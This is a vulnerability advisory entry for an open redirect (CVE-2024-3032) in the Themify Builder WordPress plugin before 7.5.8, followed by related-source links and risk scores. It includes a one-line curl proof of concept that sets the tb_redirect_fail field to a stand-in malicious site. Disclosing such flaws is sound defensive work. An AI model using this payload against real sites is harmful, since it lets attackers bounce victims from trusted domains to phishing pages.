Lucene search
Valentin LOBSTEINWPVDB-ID:D130A60C-C36B-4994-9B0E-E52CD7F99387HistoryMay 23, 2024 - 12:00 a.m.
Themify Builder < 7.5.8 - Open Redirect
2024-05-2300:00:00
Valentin LOBSTEIN
wpscan.com
6
themify builder
open redirect
vulnerability
Description The plugin does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue
PoC
curl -kvL https://www.example.com/wp-login.php \ -e http://arbitrary-referer \ -d “log=invalid_username&pwd;=invalid_password&tb;_login=1&tb;_redirect_fail=https://malicious-site.com” - https://www.example.com should be replaced with the affected WordPress site URL. - The request triggers a 302 redirect to the URL specified in tb_redirect_fail.
Related
wpexploit
wpexploit
Themify Builder < 7.5.8 - Open Redirect
2024-05-23 00:00:00
cvelist
cvelist
CVE-2024-3032 Themify Builder < 7.5.8 - Open Redirect
2024-06-13 06:00:02
vulnrichment
vulnrichment
CVE-2024-3032 Themify Builder < 7.5.8 - Open Redirect
2024-06-13 06:00:02
nvd
nvd
CVE-2024-3032
2024-06-13 06:15:11
cve
cve
CVE-2024-3032
2024-06-13 06:15:11
wordfence
wordfence
AI Score
6.4
Confidence
High
EPSS
0.001
Percentile
17.1%
Related for WPVDB-ID:D130A60C-C36B-4994-9B0E-E52CD7F99387